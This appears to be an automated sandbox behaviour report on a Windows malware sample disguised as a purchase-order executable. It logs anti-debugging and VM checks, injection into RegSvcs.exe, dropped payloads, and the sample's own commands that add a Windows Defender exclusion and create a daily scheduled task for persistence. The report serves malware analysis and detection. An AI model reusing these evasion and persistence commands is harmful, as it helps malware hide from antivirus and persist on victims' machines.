Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Evaded block: after key decision

graph_0-101954

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AppVClient.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

API coverage: 4.7 %

Source: C:\Windows\System32\alg.exe TID: 6520	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 4308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3576	Thread sleep count: 5777 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3816	Thread sleep count: 1850 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4220	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe TID: 6456	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7436	Thread sleep time: -79440000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7436	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00446CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00446CA9
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_004460DD
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_004463F9
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0044EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0044EB60
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0044F56F FindFirstFileW,FindClose,	0_2_0044F56F
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0044F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0044F5FA
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00451B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451B2F
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00451C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451C8A
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00451F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00451F94

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0041DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0041DDC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 60000

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: Grinnellia.exe, 00000016.00000002.2250241974.0000000000BE2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW.Tz
Source: wscript.exe, 00000014.00000002.2192228931.000001C880DD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Grinnellia.exe, 00000008.00000002.2099585917.0000000000D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C15000.00000004.00000020.00020000.00000000.sdmp, PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2133063417.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2149828169.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2092069897.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2101091606.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2705891976.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2094460751.0000000000614000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2092069897.0000000000614000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegSvcs.exe, 0000000D.00000002.2135239863.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000014.00000002.2192228931.000001C880DD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\E
Source: Grinnellia.exe, 00000016.00000002.2249712826.0000000000B44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: Grinnellia.exe, 0000000B.00000002.2126725116.0000000000B02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWJ
Source: AppVClient.exe, 00000007.00000002.2070469675.0000000000584000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2069766549.0000000000580000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachineT
Source: server01.exe, 0000000F.00000002.3325354337.00000000015E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

API call chain: ExitProcess graph end node

graph_0-102372

Source: C:\Users\user\AppData\Local\Temp\server01.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00456AAF BlockInput,

0_2_00456AAF

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00403D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403D19

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00433920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00433920

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

13_2_004019F0

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0041E01E LoadLibraryA,GetProcAddress,

0_2_0041E01E

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AB1130 mov eax, dword ptr fs:[00000030h]	0_2_00AB1130
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AF3F3D mov eax, dword ptr fs:[00000030h]	0_2_00AF3F3D
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00C144A8 mov eax, dword ptr fs:[00000030h]	0_2_00C144A8
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00C14508 mov eax, dword ptr fs:[00000030h]	0_2_00C14508
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00C12E48 mov eax, dword ptr fs:[00000030h]	0_2_00C12E48
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_00B4C538 mov eax, dword ptr fs:[00000030h]	8_2_00B4C538
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_00B4AE78 mov eax, dword ptr fs:[00000030h]	8_2_00B4AE78
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_00B4C4D8 mov eax, dword ptr fs:[00000030h]	8_2_00B4C4D8
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02B81130 mov eax, dword ptr fs:[00000030h]	8_2_02B81130
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02BC3F3D mov eax, dword ptr fs:[00000030h]	8_2_02BC3F3D
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_009D1130 mov eax, dword ptr fs:[00000030h]	11_2_009D1130
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00A13F3D mov eax, dword ptr fs:[00000030h]	11_2_00A13F3D
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00D0DDC0 mov eax, dword ptr fs:[00000030h]	11_2_00D0DDC0
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00D0DD60 mov eax, dword ptr fs:[00000030h]	11_2_00D0DD60
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00D0C700 mov eax, dword ptr fs:[00000030h]	11_2_00D0C700
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_00B52318 mov eax, dword ptr fs:[00000030h]	22_2_00B52318
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_00B53978 mov eax, dword ptr fs:[00000030h]	22_2_00B53978
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_00B539D8 mov eax, dword ptr fs:[00000030h]	22_2_00B539D8
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_03001130 mov eax, dword ptr fs:[00000030h]	22_2_03001130
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_03043F3D mov eax, dword ptr fs:[00000030h]	22_2_03043F3D

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0043A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_0043A66C

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00428189 SetUnhandledExceptionFilter,	0_2_00428189
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004281AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004281AC
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AF1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AF1361
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AF4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00AF4C7B
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02BC1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_02BC1361
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02BC4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_02BC4C7B
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00A11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00A11361
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00A14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00A14C7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004123F1 SetUnhandledExceptionFilter,	13_2_004123F1
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_03041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_03041361
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_03044C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_03044C7B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8D8008			Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 758008

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0043B106 LogonUserW,

0_2_0043B106

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00403D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403D19

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0044411C SendInput,keybd_event,

0_2_0044411C

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_004474E7 mouse_event,

0_2_004474E7

Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

0_2_0043A66C

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_004471FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_004471FA

Source: PO #09465610_GQ 003745_SO-242000846.exe	Binary or memory string: Shell_TrayWnd
Source: PO #09465610_GQ 003745_SO-242000846.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_004265C4 cpuid

0_2_004265C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

13_2_00417A20

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\alg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server01.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
